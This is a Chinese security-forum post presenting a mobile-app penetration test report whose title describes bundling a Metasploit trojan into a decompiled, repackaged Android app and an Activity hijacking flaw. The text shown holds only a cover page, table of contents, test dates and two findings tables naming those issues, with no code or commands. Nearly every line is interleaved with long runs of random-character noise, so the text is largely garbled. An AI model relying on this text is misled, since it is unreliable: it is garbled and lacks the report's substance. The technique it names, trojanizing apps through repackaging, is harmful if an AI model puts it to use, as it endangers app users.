找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创-app客户端渗透测试报告之反编译捆绑msf马二次打包 ...
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 4353|回复: 0
打印 上一主题 下一主题

原创-app客户端渗透测试报告之反编译捆绑msf马二次打包以及active劫持漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2022-6-8 20:32:44 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
2 g# h, B) w* k+ p6 Y 7 \+ F8 V( z( h9 X$ L( N

9 ?3 t" y9 M0 l. _) d+ q) n/ c. k8 z! w0 m
- |9 t/ e0 F, W 9 d( y' M6 m6 {) `0 a

" B/ k, n. J3 g 8 h, @7 W, o9 q, d1 l/ E
+ w [3 K D1 x6 P" U* Y' a. E$ j' d" R& w! Z% y" t; w

o( Q. o1 J% ]4 v5 `8 D, C, k; K" F 1 U; W1 V, p* t9 }' i g 文档编号:                0 e% j V: U3 T" h# W " r0 |# \6 Q: A' d& q! {

( S8 a, v/ b4 K/ L7 |$ x ! }5 G0 S; r! j. D) ^

7 _7 k1 g3 U! \ I. w5 M$ N* D+ U& q1 b H3 b0 @" g+ B   * d# }, j# W9 T' v1 e7 W5 f& a- y4 }* T8 e0 s0 A

8 F+ P+ g; G+ M2 A$ y/ M! ?3 w" r 0 _& f; ^; G6 _* v! g- R6 i

4 m5 k8 I7 G; X: u# {7 \8 R , S, o* R- `( N; D# {   * J }6 [9 Z& G, D; ~7 o7 J - E' b" Q: F% f( C9 d% t0 G

; K- \2 j8 A" [& G ; e9 z7 \) i: ~) S1 `

9 b; d7 O* k3 w# E& ~( h+ t7 Y4 C6 s9 Z0 P   5 g+ g- r. w( C' n; { s! t 0 J. n3 h4 N: ]' w

2 Z. F* K+ {1 i; s2 ?2 ?9 H ' N: \1 ^" [" D9 }4 d, {9 A

! {# B8 M: w Q6 c ! v' m( X- ^) h8 m* u$ K. x* ~2 S   & p4 J( D9 B) |0 P3 s. ^/ C: X + s' x# ?! r0 {. \$ M

7 B( I9 q: ]3 p% _. N7 @0 z" p( J - V8 \9 C, i0 {* o- w2 M8 X

1 E2 _# U) o2 `6 P: }) A, q 7 A- x* Y* \4 o* }   : p2 d. H0 l0 ~0 X6 a 4 B5 y( O. P+ `$ [* q7 _

8 e- N9 I# u! e! {& c ' y2 _1 y( V7 r/ c* t1 R8 @1 n

8 i5 E1 k. j6 h5 \; o" F 7 @% F* M* K' d+ O; u 某某某APP渗透测试 / E! u1 S% t2 ]' K/ F . H9 x: M+ G D# o/ j4 G

; K, G. i9 r* |7 I/ ] + m4 j3 ?0 p5 I/ {; \. i

( _& H3 |% r& X' e + w" R1 V+ @- |4 l& E( w   9 Y7 g! {) J& j- O0 Z0 k: H: O3 y8 b: I- ^8 l

. K' k: a! z7 I2 g. J6 {# ], I) u% M" w8 {

; U% g6 b5 s( O) r) E$ o L' K& a& m) O: Q4 x. p- {' D$ y   $ J/ i3 \5 Y7 i& \9 T3 |* x" O ! z3 K1 G: e- ^

+ v. Z: g5 x1 `1 h6 g' W( Z( x e' [" Y8 h8 q

$ ]5 N( S- t B1 I $ D: Q+ J* R6 |* j   / K5 ~3 _9 \, F3 w4 R % _7 A" D$ v! o1 ^

+ c4 J6 o& Y0 e2 T# D& r , O2 h6 c3 k) w [8 j3 J5 E3 I

+ ^3 T6 X* v7 ^. ?7 N; a % ]1 N5 J1 Q8 X4 l   + S1 T: _' t) _% N( W2 i' O" E$ i 7 g* j7 {" h0 C3 a% P

+ L; j( F8 A+ |3 b ' {5 t/ z4 [* I5 O n

0 D y$ R k7 x4 a6 k6 ]8 D & f) u: j; Z) j p 技 术 报 告 ; Z) Y) T9 s" g% S3 t : e- b6 {) g: j

2 J! K+ N$ g# S& m. w; ~& {/ i5 X3 E% x/ ~1 M- _/ {

/ N8 M0 M, T7 h # e5 o; V) L" I   ' F" r. d0 j, S! k$ d: ]8 a ' p9 w) J! `' E

* `6 Q4 X; l) O 2 w( E5 F; R4 M! t

. a8 U9 d6 d: G7 m% `8 t2 O5 S5 x1 o0 ?- J3 n2 a! C' M   + g/ A+ j* I, Q6 s7 i % i: _7 K/ R7 k' X+ o

/ a$ q- F- j( N9 {3 o3 ~) x* m w, C ( e" p5 M( y$ ^; @5 @

8 w( a4 A# S$ [+ u 3 d' B2 t. q: X# q5 Y% e   8 b9 R) J% `, I& ]3 A4 w) m0 y ; W- A4 w. Q$ B% S# j& n3 d

: y. `4 h7 b( R9 T0 j2 A( k8 o. \" g. e. c5 h/ q; n& t

: O a+ w+ L5 L q5 M+ H, B6 Z3 |$ i. [% z   ( A% f5 Q7 v; N/ T 0 [9 M% N; \* N) a8 X

# R3 A1 d$ O9 ^/ U- f/ b& x9 D: n) l 4 v, `: x$ D( `# P+ h# q! K

, z! M5 h1 ]6 G: r9 ^8 ] 8 @$ Y7 |6 I% Y' B   # a2 g& S' D( j . w4 K5 G$ N9 L/ L' l& Q

& Y/ ]# l$ |1 M0 v' g4 k$ P! r) G" n ; I; @( B% m+ b( S6 N

$ Z' {; d5 N& V! v. {1 ^# m! a* R   . V: k9 z) u3 ]6 v* m( Y7 l% b ; }; s: |+ ?0 v" Z& ]3 z

4 w# J% \9 J% [) D 2 Q% L% y; w$ q/ ^4 q- E J

2 v; i- s( [. F" I 0 h4 |3 E5 ?3 y m7 K   % ?5 G+ K( f, y7 A R7 j- [; _' h; \: g

3 B& S9 D& {9 A% Y# O 3 f3 g2 A; T4 \" N. z

0 y$ n1 {* X' U 6 W$ D, @$ f" m0 u   / K' L- |# \' X2 m9 v 3 C' P) K! S3 J, U: J+ T

7 ^5 O5 i: o* O $ @( r1 ~# M5 \, Y6 a: |3 `* M

' J& x9 W. m! `5 ]2 x8 f, e0 r 7 ^' n- u% ?1 r$ S* I. V, `   : T! [: a' j3 V" e / F8 u; [9 y' R' h8 Y& c8 K

5 |$ R* H7 Z, W/ p. J. j# i # Q. N. R# X: m: ?$ x# D4 F7 d

- x! S g7 x) k" N& C# z5 a : l. D! Y# K# s- r6 E' I3 E   $ p) S! T( L9 f# r* W# N# O ( F7 e; y2 c$ F4 W: t7 A

: Y" l5 t; j: V' B$ \0 j6 Y 5 ~7 J8 K- A0 y* D0 J- ~. T- R9 \ g

8 X! G" j2 b9 z' W1 [ G6 h : l9 Y- a T: z( N2 I   " R0 J: Z' a0 N 8 O* @6 T( G+ [" w5 q+ E" B! r2 g* L

% ~2 G. o& R- O5 j- R, I * L- H z4 w' {( P% d% `0 u, \

1 @3 E& o9 g- q$ z1 h& [5 y. \; V5 n$ P " a" s% f+ B/ t+ y$ s   5 ^. s3 g( c& ?- j$ Y 6 O$ x& k4 b# r+ S2 z: R

/ }! w) z# i H1 e' ?6 \- j. L# Y) k1 T* G, ~& @- t

( a$ s3 @2 F( [: ] 4 D9 S U, j" q8 J   3 @; h* e4 O. Y, N( V& M+ L # ] r" j' j8 [. b

8 s7 G4 O2 o3 u5 X1 D9 V, k* B C# m7 ^! t9 y# x; ~

. \1 U- [4 K! U0 f% `: {9 [ & s5 i" `3 p f! ]" v# Q- @   % J. C7 X/ S d) k6 W 9 a7 X. v. B& e. T

" A- u. o- p- H ) W2 T: r4 q7 ?* P" \8 H7 L% H3 s( n

2 N1 K1 O/ {& v3 a: ^' d- X/ k) B   + T% K" B: c+ B( q; N8 d1 v5 W9 M8 x4 g; M' z3 E+ u

2 G! ]* X( O, o0 M) g' y+ E }; p# V/ U9 A- j) k3 V

8 N% `8 S$ j2 w" P5 G8 J: I8 m , s7 y8 G! }% C9 O5 u   ' |/ m3 y* G7 x8 ~4 A ' d) y8 ?( Z0 l' o" Y7 }

9 g( L J- B! f % |2 K% z. G; N1 d

5 c$ _' B; [0 W; r5 }2 q + T* N9 X) i+ m   & c' p! U" d$ N- P. T% g! }$ E. Q* y# }

4 G* B7 f! v; @& B$ R- H7 e+ g6 d. }

4 d' o4 y3 T+ D8 ]. d& X0 u 5 m+ \4 S3 l4 a( g/ B   % V! n B' w9 ^7 }, R1 }) T; `7 |1 t5 r! ? ~3 Q4 u

. `) F, X( Z3 m! H1 ` * M& I3 T5 e+ T* y: N

) [' N% C3 {/ b. h6 b9 }# q. z8 U 二〇二〇年 ! ^. }1 f1 V' \- f % j: s+ Y4 F5 _( L3 s0 j

' m/ f# S, @0 Q j7 U; u$ d- Y/ B% p& b# w* S5 G
# {* o" P+ v+ H# k ) p5 E6 B2 h) q: T
- H0 n) V" U! I! P3 z& \ ) K) r3 V' v5 s9 W+ M / s) T3 ]# f2 ]2 Y. T6 R ; @' ` f. D- ]) V$ p
6 |/ [. T d4 \2 _. W: @' `. h3 z' @ Q5 A; P
: d8 W3 R9 i% e. B & e. \3 u* g" t5 ?
& I% `& |: M$ ?- K/ i! M ) Z- ~) E' Y" l4 b0 p0 L5 K 3 ]* t5 x) x" X6 [ 3 x* w8 Q; i ]$ M, T' R
9 Z( j" n* F* O2 l 2 i# z4 q4 F, a7 F9 x0 a% j1 u

9 K* E4 _2 b& O8 P* D 0 [7 f2 V( N* h* `. W- J 目 录 / m; o" C F$ y- t6 E( C+ W / ]) f. J y2 j. a5 x, J# F; C& L

/ j+ Y2 h3 a9 f; W ( w5 a2 R [# w* N* I& X & W" X4 g& j- r3 \+ d: x4 w 6 T9 A0 o0 H; T" T/ E

: k6 {& s8 t/ L - t" X# z; Z- c) d& y2 L# F   1 s$ U( X8 _; q% ^4 N8 k/ a+ [5 k- M8 k( l, H0 e* w

+ w* C9 X" F! I- J' l' e {, }, `; c, t# D) k

% e) q% U( ?8 {7 R/ i & k" Y# v/ ]; @1 K9 L6 u 1 概述... 3 / E3 U% `, s( c8 r& Q, ?" P6 P" E$ i( a" ^& h9 k& n

8 g& [' P" h+ m( T$ N( o1 a3 } ' u& s1 M$ K; X* K7 @ K# l3 O

. ], r8 |# `4 _5 L$ v; n * {$ }, Z& ^% B; I 1.2测试时间... 3 : M( A# Y* `% s$ a" O4 e9 V" N+ h1 Q

4 Z G$ q5 x& \" w: v. z+ e' e ' R- ?5 p6 U. T/ j

$ I" P" ]# N6 B/ P+ P( @. E' f, E" d" L. x5 z 1.3测试对象... 3 # r l/ u: s0 s$ r) \- r5 @. v9 w2 @3 e

6 M; A, C) k. O% u" k) K4 v # B: w! K+ S$ I1 f/ v" s9 x

7 O: u. R- ?% B( _/ o9 j3 H/ `$ K4 W- z% `* i5 g" Z# a/ K 1.4测试结果... 3 $ t: z/ E( s" H3 P4 r6 N" j+ n2 |: R+ X" X! `$ W

' _- i# K% X2 V7 R% A 6 a$ c: t1 N1 E7 _! }

$ W3 `/ s! G6 u" y/ a1 q# I% A8 @7 [( }& ? 2 检测结果... 4 ) B( T. t j# r * o; A' e% z; t# ~: ^4 z$ ?

- x6 T: {) p K( W6 g# b + I/ [' d0 K; d5 K- b8 J0 C" k

6 G* S* E5 C8 i8 b 5 q0 m, G: F. w N. K+ r0 I 2.1 某某某... 4 " S: h$ V; j; h% p8 ]( Y* ] ! Y! x6 p6 S# t3 y% s

6 H \3 w, K+ B* D 7 y$ I' t4 p9 E/ ~$ f4 N

% b1 M* w9 N( s! m% B* q! e8 f) n3 B$ a) a/ \ 2.1.1检测目标... 4 5 @6 Y5 I+ H' i$ D - n5 h- k2 R) r K4 |! H& E7 A

0 ~) P5 Q8 V$ n 2 u0 t. z, ^% M3 y" a* r4 m

9 H/ n! L2 V; g! C! ]8 D8 n 2 a- j, y5 V L; x3 a/ M 2.1.2检测结果... 4 ) x& r& l% c6 {4 O2 ] ! l, _# L0 ~ _

) I( k6 m l" `9 C! ^$ e% k: S. r- \! o: t- R; M9 D

) c! J- v3 n. T& J) Q 9 B- I [2 U! ~; ^5 K 2.1.2.1. 4 ( A) ^6 C/ i9 v, L& X3 M1 u) d9 H/ y* D & W! e+ y" W0 @# H' C

6 C8 I6 J! h4 j; \' o : p4 L3 P6 a: [" ]& M7 d

: o5 U' V' f: I5 [+ f( x % ~7 B( R" s7 R. ` 2.1.2.2. 6 4 E0 J l8 f4 _5 ] % b+ N7 C/ {% S5 e& H; D6 R

1 t' J. _2 W; F+ H , ]; }" T0 J# Z9 O3 ?" c" L

7 ?) h8 B5 p! R' A% P4 s 5 k2 P( z% {0 |; T$ Y $ J: a7 c( ]0 d2 O8 v ! F0 V8 q9 Z/ K% a2 C

3 X9 u& }; {# v1 q: V ( e: [9 i5 n3 ]# b) N % c( X* f) M6 r8 ?0 H! i! T. H+ L$ p |# v; }1 q& G1 ?
3 g, L- w' I' r$ h7 F: r. v v6 {% o6 K6 Z$ w. v
$ p1 `5 }1 B- D : j: ~$ U; z! r3 V6 m: b7 b , w6 ^+ `! Q$ Y8 k! s1 R 7 g8 K3 C, \, o" _3 @( X- V( K

# W; z$ b. T/ d ) J1 G5 B7 r6 ^" \ 1 概述 7 ?$ k+ `! {8 x* I2 |5 e" ^- ]2 _7 r 1 L" c7 I; s; o Q

/ O9 u0 c; r( E$ J" g 3 G) w! T9 o/ [7 p4 q! Z

( ~7 G/ O, t2 m 3 |3 T2 v4 k5 P 1.2测试时间 . x' p/ ]& c9 O4 J; P3 p - N& Q1 m! @( K* q9 ~1 Q* L

: ]2 h, @8 h0 J5 |; ~( K6 Q3 ]/ S+ L! ^* n * L* z& ?+ m& h1 x* f0 {1 K7 L& x4 K9 k( r$ }9 ~) R& k, @( A& d3 i3 b& X* Q! j7 R( d& `: K/ r$ h; }5 \4 Y1 g- E; _# x2 `9 g" ^7 C4 ]0 W3 W" v- g2 g# C* o' _( B9 A, H) h& C6 ^ R' `6 W$ V t" Y3 \4 c2 w* \/ U; y* r0 ?' A/ i' l/ F6 V. j, o7 q4 B1 V: p* e/ |" G: ~+ D/ }5 l/ Z! b6 n Y/ m, x4 x8 @. H8 q6 h! a! s$ Q, Y" d% z! t- |/ n0 n" b. R! G, G5 \$ A- L/ M3 k6 P: h, U# j1 w% t; N4 }! \( C0 t8 @" j6 @+ b# a2 v7 F6 T" Q+ ]6 m* m8 g5 g% Q& Q* {0 q: _$ V0 }" K9 x9 @, E. m+ p' o* \# O" _8 @* x: {% e6 Z( S: B. Q6 @: K P u* `% ^( o+ L# r( |+ r: s9 t4 G8 e7 c/ V: K% {9 o7 ^7 E* O- e( X# m1 n2 L) X: E9 z. Y3 P% [: ~# c) u6 T$ Z5 ]7 z1 ? O5 s" D
. _: U( l: v: x5 E7 W+ P3 L C' N3 B. G2 `! @

8 y1 U: D* ?2 K& r5 a, @, z2 x7 X5 F& M3 C- C* U4 L. L. j7 T" V 渗透测试时间 % S2 ~7 A7 u h& M2 Z5 `: ~ , V4 T8 m1 n$ J& x- J/ X9 ^! K& S; f

6 I1 w7 E& G9 g' K6 h% V / d, w, P( k0 s v1 o/ Z" L
& E3 {. |. W4 L) n! ] n - M! k1 W& s3 m, _# Y( y, _8 J. W5 G7 [

7 _8 P; c; p. L% V: B. E # o4 w; W) [/ z+ j0 O8 F& J1 G 起始时间 % \' G, s- D6 v* @+ v5 G* Z 8 W" V0 ]: F& ~

# e8 p$ f/ d& @: v3 m5 H' A, p , W4 \. T; ~; V8 r) P 		0 p, w0 x9 }/ i# e9 e! N4 u % d8 S2 H* p/ j6 R

& \8 Z" r N, s" C7 x! P2 Y ) P6 o4 i' V0 ]' k, C) u 202046 6 v& g6 J+ d' t# ? T1 Q' G9 u; } 8 @. M1 o& P" E- i2 e% |

' R2 I+ L5 ~ z/ N6 n . S1 t# `% w2 {4 U) d- P, D
3 Q$ P% v: N o6 |8 @/ K" ^ 1 ]; @* l2 Q% S# G7 d

# s* C; H* ]. _; O" J9 `! t 5 H$ |+ v3 O- D) w 结束时间 7 Q2 J: I, _, z3 }+ D7 _6 ~ 8 `. a8 K, a) a5 I# \+ S( F

8 [# F5 b# [1 X # }/ B' f' H( z3 J. h' R 		; E, _. W1 H5 a& `& |9 ` / [1 R* p/ y6 E+ a$ W) B4 v

: i* c; n) @, J+ }5 R, N9 z! ?) C! J 202049 % n) I6 Y3 m( h8 Z) I! H( H + ?) ^0 D7 D* Y7 S. v5 w

% C& e2 A' _% o" n, q) Q ! _# z2 K* N i: f9 p
3 [6 K% c2 _7 j3 y7 H( b; Q/ {- U" ?" Z

8 i" x, _7 W6 C6 Z& u/ B+ a' ?3 x # j. m4 _6 B* T 1.3测试对象 0 o1 ~! H% S) \4 o- [% N j 4 w8 R) j2 o" k$ R# e) l2 R( Y

( G4 ~" J* w3 l; c) v8 [; M6 R0 D% P- {, v

- H' v4 c7 c( h, o! g Y$ j8 [ 5 A1 a3 ~' P( K) |7 j 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: & S3 B0 P+ E ~ @+ n8 ~0 l- p, l; w \0 G y9 ~/ D$ R. ~9 L

: {6 i3 N6 _1 O$ p" S 4 Q) ~/ ~; K9 |0 u

% t* [, n8 k% ]6 d# A& U% [7 f % b3 y& B. m- D0 s' l0 f 1-1 检测对象 % Q0 x) a8 u# T5 W2 M4 Y* V , X3 S* p9 Q; l& t% k C% Q. h( m

6 j0 O( f* V7 ?+ a) p" }% K - h4 w J, E; Y. B $ k) l( r0 j3 x6 ~0 m# A/ V' {5 d, e v: m7 ]8 t5 a L* m& b& d$ z$ q* t* x, Z; _7 k% f/ \- u! K5 \- N/ l5 x" `6 n7 T% A: i# d3 \& s: X) Y' k7 ^# S% g$ s/ w$ b2 g* Z" ]! I2 k% d8 V4 P4 I& B: V) i# ?9 S2 g6 G, x& F' d& q* O) g; Y. N! t) m: _3 j$ q1 f# C5 C1 {6 H& R' N+ o) @0 t' w1 n2 m) \3 U; K# K( S/ I* `; M& _6 b' \8 j; r7 L6 J+ z3 i. v: f. h$ b: W* b, T- q2 h' A6 j9 {4 J' w0 i% [ F, c2 f1 g7 C/ o2 i0 c' } u/ j6 H; C3 o* e2 Z3 J0 g! W: ~8 N1 [( ^# s# Z/ H J( g) c: m6 i3 X0 c4 h+ i* K* H& i! a+ ?9 R- O, S* s9 l* V: R1 @! ?4 X4 Y% \& Y; L7 s4 y: w2 G/ b, L4 o) N: D. f& o5 U; s, b1 j7 J" e! ?$ A9 i: L5 d" b* Q2 F- Q. ]5 ]" c9 T! A" ^6 @% U( W d8 ^3 k9 `' U6 h" H: d- J" T- f6 [* m5 J0 g+ u+ N- d2 z6 b5 I1 H5 @3 \0 j0 n
$ ?! s! c( d! Z, z* ~* X1 v$ M8 U7 `3 [9 w; m; N6 o, W0 m: s! A3 i

& Q$ Q1 E! U# P: i A ) ?+ y- D/ i% n, ^/ R1 a9 B 序号 : k- J5 ^9 o, S& y: W2 q L! j- b% L( C6 M

0 d7 P6 s; {0 R/ @7 b$ S# |( a 9 V8 `3 ~* a3 n1 O: S+ z5 h 		( i( C, l; K: K, L3 S 7 m2 ?* s8 m# Z

) p1 l5 s0 F+ o2 o0 J9 i) @" l# g n- j9 z: ~2 x) T% u5 c4 S 测试对象 ( s# a1 a7 g$ \- U- l/ P 6 e7 P& ?" u3 y9 H

: j+ ~! t' \3 `) U9 ?, b . ~+ y; A# X) A4 b 		/ G% t- ]8 J( u c1 O- `/ ~ ) m; t3 E! M7 M/ T+ C# n

, _9 y- U& E% `' w5 Y* w* i9 k/ Z 测试地址 1 j) T* \: t+ a ( e# J7 b1 g- A7 E" I+ e& C

1 i# m! \+ l% h# M5 [, V' q% D+ O+ C5 w- h8 g6 W* n7 p) E: B' p 		' H$ M2 q$ I! y3 ~- r/ ?! ~ ; C% V- |' B8 o! x9 v4 e

9 L2 Y0 p8 L+ [# M 8 W) D/ P& h5 x8 h) A 安全漏洞 2 i6 y( ~( u' ^4 [9 N& l- h 1 J+ W$ {* I3 p* N3 X$ S: x

, L3 S4 ?* h0 y* t% V* ^0 L3 y # ^! f, i! {" W- u- r$ m, L
o r8 e9 N/ F% x' ?2 l H2 A % n+ e* k' w- b; M; W n/ }

& [! m" Y9 M E! \( }) d+ h2 B, b) Y3 y; E3 a: H 1 $ Q3 g ?3 |8 R4 G& A1 f* B4 u( V 1 L8 n' u8 h) E" f+ P' w

' s# v( D+ n( v! K/ K' Y! h; S ! Q2 f% O8 N8 `, L 		4 [) G& e) |, l# v& Q0 N! W + B4 m5 x' ^ R( k" g# ? u7 l

0 c, u% J- ?& v1 a' Y9 m) f / |" u$ R, _! q 某某某安卓APP 5 W* n( ?# g. K- R0 g+ }0 [4 H( z* m1 W$ o3 U5 w& V+ v

0 k9 z( s. _6 X) D* J ( M. R0 U) f4 v$ o# ^ 		- H& T- X: m# G+ F: h1 f7 x& } 8 `3 \0 i# o2 a0 J! S8 I0 E8 K

8 U9 K( `5 ]' Y2 `& D$ V + n/ e/ A* o3 E: `8 R   P% x9 }# k* J* z8 w- P, Q$ ?0 | E1 q5 ^

; C5 r3 v5 V. q% w5 c : R- ~3 U0 L. a" K 		0 `& z+ X& L2 L7 t0 V( {4 m, k ) i4 o0 g+ g; W. m' I, d6 J' r& ~

1 r- G5 N/ u! \ # k; f9 i! W9 L4 R. `$ Q. x& k 2 " ]) k4 y: Q9 l* ~8 P# [ c9 V# O. u g" p+ \0 D

8 O0 T, ^; m7 t8 m# c 7 P0 {) ^. ^+ A! j8 j' a
" ^3 q& Y l8 ?5 U 1 O4 m2 _) H' c

' {4 I0 }0 ^! ~7 H q! |) B& \ " k; W4 O2 D2 k 1.4测试结果 4 _3 d0 a4 ~' a/ P- L5 L* ?+ O) W 2 M% u& m( i% \# p6 f

% |$ H; s' [! d 1 J+ N, a' g! x- N+ y+ P

3 K9 i8 g$ F( E- t/ L- g* u) [ ! r# J, J0 v/ S# j3 Q+ k) C 在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: 8 _" t5 n. V: l3 b( {! \1 g w, v! } / B; B6 N" F( X/ F/ ^# b! ?5 }4 t2 y

7 b) s% F6 U+ n3 P h0 u7 n5 Z9 F% G: z3 U& t/ k4 R0 j

( q: a/ G D6 ^* k( j ( {( t7 j4 \& w) H- V& F   # c" d" ~4 G2 ]. b8 p, l % X, a j. R. _6 u9 u

" A* u& k1 ?# [- c6 S8 Z o; L+ @) g' `+ D$ R7 X! x
8 F" R6 Q' d' A& H; B% p5 E& y v $ O- p5 {# Z Q, D8 U1 C G 4 D5 U* I3 J5 \0 s; r4 c2 Q# Q# T0 }" H' C* D/ j1 Z; f/ [7 _+ I6 G# ~4 B$ K4 m, U& T( Y8 c+ T. _4 E& u+ s8 b9 W: c. c; m! \9 T" {+ U! |- }, {- M/ Y1 q# c5 }2 A T' h; W% u! x P4 s, J5 T9 a& X1 `, q+ e' M% I. Y$ {" M' e+ _( d) k9 M& j7 M4 f" Y2 n1 z. P& D; C; C% d( b$ k! W* L: q0 [2 T8 Z1 O' S, C Q# F1 K5 B4 ~1 T& Y' s4 M: i9 J5 o/ C$ g7 \& s- J# E; F) K: A& H1 {: E# K; T i0 `, P o* O1 ?9 q% |9 ~9 Q" w+ N/ c( n0 L, D5 n4 U2 N% d& n6 w% D. ]5 c# X5 G4 j, I& `( _ Y( P; G' T' D. P7 B" n4 _0 g$ F4 j7 ?3 J* A0 [/ n7 w1 S7 T" r2 Q% z; e: b4 V+ F) i8 l$ u2 }+ L. Z) v0 J9 Q% \. [- s9 N d+ V* T4 Z3 `+ N9 X0 s! s; v7 T1 D0 v' }" V* Q* r. v$ d* J) L5 B( x. I/ Z# n1 s1 X- C/ `) d9 D" R! S2 b7 J$ [3 [# w" s$ s1 _! _% J6 s( h9 X5 c, K* I5 q0 I9 q; `: V9 ]$ A m8 b% d, ?/ _6 O# ]& q: ~4 |9 s3 q$ v9 S @# ]' r# u; ~. C' ?8 j! L6 q2 M) d: L* a- }1 E" p, S: V+ a5 X4 b$ Z9 D( o2 o$ l. @/ `( w! `% U9 J0 i7 J% N" ~- ~, p' u; S, Y9 [9 g7 }: W8 y. h* Q! g' U. t1 c6 z1 G, u; J* I! G: ^8 [ [: Q/ t& V6 q6 R( I7 d! s) s) u$ g/ N( o' F, u9 n& u) m) T N# K2 w9 A$ @3 e. N* x+ x8 {2 H# D3 m8 y( j7 e7 r/ X k; Y+ Z# ] R$ g. D
" n6 I# M2 l4 ?. o% f, S* o3 a L" } `- p6 p7 {/ H) B9 O# Y

; R5 T0 E- _0 z0 _: z, M- F$ s r 4 |# u) {: ~: f. j X7 k 序号 1 r% S6 j, v0 o G' @0 b% J % D! b2 X- P* t/ x D) P- C

* y D# }9 ?# Y) y% Z * m# `, X) m4 p- g5 ^& w% ^3 I 		; h, ]# U6 m* ?( D- z( ` 6 e) J: R0 x {

9 t, {* m" y L- V ; j: o: S* o; b1 s 系统名称 5 S$ m; a1 o; ?% F 3 U H- o( }7 v$ D( j- {

* _4 D: |1 l, s4 D% J9 M+ R & h$ F ~% ^8 _! m 		7 ~8 z4 L/ ]9 J4 Q* Y/ I: d) k + x/ x6 w+ W4 n$ S3 R6 O: \; g6 W' |

: h1 R( i$ t& y; V6 v5 l 5 V' d3 k- ]4 @/ n, u* S! I. E6 E 漏洞名称 7 `6 C/ f5 k1 N* R4 p ' s$ y3 d) O" \' g5 m3 ~' [

! e/ o8 j4 Z; I- _: k" B S9 F1 Y$ H- U9 V- _0 ~ 		/ J% ]. T V9 k$ Z8 g% Q9 {8 ?6 o ?- W, I5 u$ |3 {

. C1 s9 L0 Z0 X/ @- p, f ( B2 r" f$ T( D' q3 o 漏洞危害 9 X6 k8 _# B+ h, s" {" N$ c 3 E5 F) {; X8 F& k% |3 U# ?4 H

: @! C7 h4 s8 Z . @; A$ B. s; U1 [$ f+ L9 G 		% ]: d5 {, ]. T8 k$ t: Z" Q! q/ X) l8 ^

% e- l* ~ V5 n" }3 K/ d 9 Y5 A" G" ~$ o1 u+ @ 修复结果 S0 ?- S1 r& @* y: H0 y2 S( L' _& M

+ f9 U- W( c7 N& c+ |$ J * f2 q: E: \- U9 [
2 m$ |8 F3 m4 z% [ , U, W6 u6 P: S& s0 Y4 d; y! \

' e- S: G/ c5 ?" M7 i/ l; n, X+ W b J# B: W5 s& a D4 p) W 1 , }% }3 f, [# e0 _. N# o2 y& u) g- X$ b- Q6 T9 `6 Z, C+ P* Y% b4 K

' T E! l- R# D! M% b) E$ W- A9 r6 F & |2 X; `; D4 J- F* V) c" W 		' k$ [) P# Z3 O0 x " C* @1 A" p! v& _# J

, S1 C7 `6 V" X6 T , ?) C8 b( U2 G 某某某某某某APP * g* N) M3 j& k5 V9 B ( U* o8 y+ g" l* `* f0 [

1 M: }' U$ p# e, ~' Z8 G 0 d5 Q/ Y9 Z7 s! A' C1 H7 v 		, q( ]2 H( p1 G( h 1 Q1 t' B+ {4 X

! m# L, z; {6 p* U# v' u( r, H * M# Z0 G5 b% z- P Activity 劫持 ?" A, S6 _0 A8 g, Z- o- Q 6 m! U" p" [2 @6 Y9 B# r: E5 J

) h6 q# [ [: ]& K: F - @0 C& w6 }& ^( t5 p

% w d/ v5 L& {$ t: k ) `9 ~, ?3 z" [$ w( s* Q   " E* i7 O+ E4 T0 z' A4 h+ U; b 9 y: o1 O! e- j* d

0 [& }. p" M$ E5 A; R4 R ; ^! @6 W6 D6 l7 S) P 		; j5 g9 p: f) A$ y: G 6 r0 d/ |- y Y4 Z7 F5 l3 X

% ~! {( W) g; ~ 4 p8 D6 g! j7 e) y# Z. X X! @ ' g @" p0 ?1 c: h1 d / T& j' l# X y7 o# p1 u% S

: t- @: T9 k& ?4 B; y; j( f ( G/ {9 |. d3 a+ U2 D( e 		0 L9 P9 B9 G# d- s% }) b& Y( k/ M; R( H" Y R+ z1 C7 ], U

; e6 y# k8 H* N5 H+ I8 h1 B+ w' I 8 N" f3 [" m' t# {$ n* T   4 l R. P. C' E. r2 m, c* w, c C3 X% X3 ^( W. A

) @$ i$ \; X) S7 N: } 5 s6 K- E$ P( x
4 T& u# T8 ]! V' i0 A7 B _5 l1 {1 R% ?2 u* H0 ~3 b8 Y- s0 e

" d: r7 s/ n" H$ Q + A+ l. F4 F. x2 [ 2 - N1 b9 \) i' h* c3 |3 [3 N. `0 u9 J3 C

! [# \- C6 X1 x8 C 5 x& t& R. \/ k3 F, ~4 { 		! h# c* W- l6 e+ {: `1 j! G6 i ~+ u9 V, u1 d6 h

: o& c$ I! [3 I; L: U/ [, N$ ?) C5 I8 W2 Q8 ^* O# i 某某某某某某APP + G+ X2 D% h% A7 P! `: M% }, [0 k & J+ _6 S3 g+ [4 E. x0 P! ]! q

8 [6 w1 A: J4 N- d( ]: o& ?2 f ! b2 `: @. |- J' x 		' d+ `" H q7 [0 k* g+ s( i n " Z, R' Z. w# Z4 [, a* J, V

! B+ E; ~) p4 l) z' M( I 4 R( {- U% l* E) i( R7 t 反编译二次打包捆绑木马、篡改APP代码 + Z) z3 S6 ^+ @& [; [* j7 E6 r* S; A% d

) {6 I! k/ g- z6 w# \; x' C. P; o8 V; E 		+ p4 G: u/ d; H" S : y3 D5 I9 c; Z' d

* e! D3 I- J7 k7 W4 U 1 D8 b: [; J9 Y- P$ H $ k d a C4 w0 j! L 4 x ^+ h o1 \$ u. w5 w

6 x; p& Z+ v( K; C8 s/ ~ : ?( U9 I2 j& U3 q 		( ~' E- ^, N" F. t& H+ F6 E' i* R 9 {9 V/ Z& @: K1 {+ _" e) {

! `6 S- o1 ~" ^ # Y$ h; S$ ~" q$ z   8 | z4 {3 a6 g- ^- b. x) A F |' p2 c; w! M8 a

. T+ a% q* S5 d 4 Y& ^; m" ^! F" Q# l
/ q' Y2 f7 J. v" C* R4 S7 N H- }: \" Y/ R) x$ I
2 _% f) ?4 F, b# j# B& \ , S* d" Y6 a- T( N5 [3 Q

